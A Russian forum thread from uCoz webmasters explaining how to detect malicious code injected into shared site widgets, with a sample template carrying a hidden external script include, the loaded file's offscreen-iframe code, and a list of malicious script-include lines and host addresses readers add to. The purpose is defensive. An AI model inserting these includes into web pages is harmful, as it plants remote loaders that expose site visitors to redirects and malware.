• Страница 1 из 1
  • 1
Форум » Сообщество "Скрипты - in.uCoz.org" » Для и О uCoz » Как обнаружить вирус на сайте юкоз (Примеры вирусов в скриптах)
Как обнаружить вирус на сайте юкоз
ProsvetekvatorДата: Воскресенье, 10.02.2013, 18:23 | Сообщение # 1
Статус: Offline
Полковник
Сообщений: 152
Награды «2»
-
+
«7»
Сегодня мы ознакомимся с распространёнными вирусами. Подобные вирусы часто находятся в скриптах предлагаемых веб мастерами  для установки на сайт. То есть имеются в виду любые скрипты: шаблоны, часы, информеры, виды материалов, плееры, мини профили и т.д.

Вредоносный код может быть внедрён (вписан, дописан) к любой самый безобидный скрипт для сайта юкоз . Вот пример на первый взгляд безобидного скрипта "Топ пользователей" для сайта юкоз.

Код
<div class="screenshot">    
    <table cellspadding="0" class="topten_table" style="border-color:    
#000000; width: 100%; margin: 0px;" cellspacing="0">         
    <tbody>    
    <tr>         
    <td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px; width: 48px;" onclick="'';">    
    <center>    
    <?if($AVATAR_URL$)?>    
    <script src="http://xall-pc.ru/up.js" type="text/javascript"></script>    
    <img title="$USERNAME$" class="userAvatar" src="$AVATAR_URL$" border="0" height="48" width="48"><?else?>         
    <IMG SRC="http://bambun.ru/images/noav9atar.png" BORDER="0" width="48" height="48">    
    <?endif?>    
    </center>         
    </td>    
    <td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left:    
0px; text-align: left; font-size: 10px; font-family: tahoma, verdana,    
arial; color: #555555; line-height: 14px;" onclick="';">    
    <font style="font-size: 12px; color: #000000;"><b>$USERNAME$</b> ($NUMBER$ место)</font>    
    <font color="#1882ed">$GROUP_NAME$</font>    
    <br> Релизов: <b>    
    <font color="#000000">$LOAD_POSTS$</font>    
    </b>    
    Форум: <b>    
    <font color="#000000">$FORUM_POSTS$</font>    
    </b>    
    </td>         
    </tr>         
    </tbody>         
    </table>    
    </div>


Этот вид будет исправно работать и не предвещать беды ( до поры, до времени ), потому что в нём находится вредоносный код скрипта, вот он ▼

Код
<script src="http://xall-pc.ru/up.js" type="text/javascript"></script>


Откроем содержимое файла up.js

Код
document.write('<iframe src="http://yanreyaa.pp.ua"    
style="position:absolute;left:-9999px;top:-9999px;" width="468"    
height="70"></iframe>');

Разберем код,и как он работает.
Команда document.write выводит информацию, дальше в скобках прописывается выводимая информация, в этом случае это "фрейм" в виде тега iframe который представляет собой страницу с установленным адресом и размерами.
Для "фрейма" прописаны стили (style), это довольно интересное свойство position которому придали значение абсолютного позиционирования.

При абсолютном позиционировании основную роль играют свойства положения, здесь они представлены в виде свойств left и top, где left (положение от левого края видимого пространства страницы) а top (положение от верхней части видимого пространства страницы).

Теперь представьте себе такую картину,обоим свойствам придали значение -9999px,а это фактически 10000 пикселей и со знаком минус, значит страница размерами 468Х70 смещена далеко за пределы видимого пространства, другими словами её просто не видно, этот элемент спрятан от вашего
глаза, конечно вируса там может и не быть, но это дело времени, пока на страницу "фрейма" его хозяин не добавит зловредных элементов которые начнут себя проявлять перекидывая на другие сайты или вредить иными способами, но не думайте что все "фреймы" несут вред, они как кухонный нож который можно использовать как в добрых так и в корыстных целях.

Всё это я раскладываю для тех кто слабо разбирается, остальных прошу не считать это нудным.
Далее хочу предоставить вам список зловредных кодов с их
содержимым, если заметите их в предлагаемых скриптах - удаляйте, без них всё будет работать как полагается.

Код
<script src="http://china-air.ru/tsed.js" type="text/javascript"></script>


Код
<script src="http://xall-pc.ru/up.js" type="text/javascript"></script>


Код
<script src="http://sanpb.ru/text.js" type="text/javascript"></script>


Код
<script src="http://cm4fan.ru/none.js" type="text/javascript"></script>


Код
<script src="http://am-investor.ru/higer.js" type="text/javascript"> </script>

Код
<script src="http://activiks.ru/img/png.js" type="text/javascript"></script>

Код
<script language='javascript' type='text/javascript'      
    src='http://linkpeoples.com/7pg0t744isc7uyuk1o268kz477muamt'></script>


Разумеется, что это не все зловредные коды, если вам знакомы иные ссылки на вирусные сайты, прошу выкладывать сведения о них в этой теме.
«Пред. тема | След. тема»
ProsvetekvatorДата: Воскресенье, 03.03.2013, 15:59 | Сообщение # 2
Статус: Offline
Полковник
Сообщений: 152
Награды «2»
-
+
«7»
Вот еще один появился
Код
<script type="text/javascript" src="http://camadmin.ru/earch.js"></script>
ProsvetekvatorДата: Воскресенье, 21.04.2013, 19:06 | Сообщение # 3
Статус: Offline
Полковник
Сообщений: 152
Награды «2»
-
+
«7»
Мошенники не спят! Вот новый код:
Код
<script type="text/javascript" src="http://returna.net/background.js"></script>


Распространяет его пользователь Dog, будте внимательны!
На нашем сайте все его материалы проходят модерацию и выпиливаются вредоносные коды, так что смело устанавливайте скрипты, не боясь подхватить какую нибудь дрянь))))))))
lanaДата: Среда, 12.02.2014, 20:06 | Сообщение # 4
Статус: Offline
Рядовой
Сообщений: 2
Награды «0»
-
+
«0»
Вот еще один:  
Код
<script language="JavaScript" src="http://101widgets.com/01105007/1/1"></script>
ProsvetekvatorДата: Среда, 12.02.2014, 20:12 | Сообщение # 5
Статус: Offline
Полковник
Сообщений: 152
Награды «2»
-
+
«7»
lana, спасибо! Давно не обновлял эту тему.
Проблемы по установке скриптов пишите на форум: тыц
Пообщаться здесь
lanaДата: Среда, 12.02.2014, 20:27 | Сообщение # 6
Статус: Offline
Рядовой
Сообщений: 2
Награды «0»
-
+
«0»
спасибо вам, за то, что помогли!!! не знала, что и делать, наткнулась на вашу статью, перешерстила все блоки и вот!!! Большое вам спасибо!!!!!!!!!!!!!!!!!!!!!!!!! Спасатель respect bye ok
ProsvetekvatorДата: Среда, 12.02.2014, 20:40 | Сообщение # 7
Статус: Offline
Полковник
Сообщений: 152
Награды «2»
-
+
«7»
Цитата lana ()
Большое вам спасибо!!!!!!!!!!!!!!!!!!!!!!!!!


Пожалуйста, оставайтесь с нами)
Проблемы по установке скриптов пишите на форум: тыц
Пообщаться здесь
Форум » Сообщество "Скрипты - in.uCoz.org" » Для и О uCoz » Как обнаружить вирус на сайте юкоз (Примеры вирусов в скриптах)
  • Страница 1 из 1
  • 1
Поиск:
Понравилась тема? Расскажи друзьям...